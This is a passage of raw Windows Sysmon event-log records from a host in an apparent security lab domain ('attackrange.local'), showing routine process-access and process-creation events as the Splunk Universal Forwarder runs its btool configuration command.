ll.dll+51791 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C75-5FA1-4A00-000000008801}39203892C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C75-5FA1-4B00-000000008801}3904C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.223{D28789B6-7C75-5FA1-4B00-000000008801}3904C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C75-5FA1-4A00-000000008801}3920C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4A00-000000008801}3920C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4A00-000000008801}3920C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C75-5FA1-4900-000000008801}39363928C:\Windows\system32\cmd.exe{D28789B6-7C75-5FA1-4A00-000000008801}3920C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.219{D28789B6-7C75-5FA1-4A00-000000008801}3920C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C75-5FA1-4900-000000008801}3936C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4900-000000008801}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4900-000000008801}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.206{D28789B6-7C74-5FA1-4100-000000008801}40004004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C75-5FA1-4900-000000008801}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.214{D28789B6-7C75-5FA1-4900-000000008801}3936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 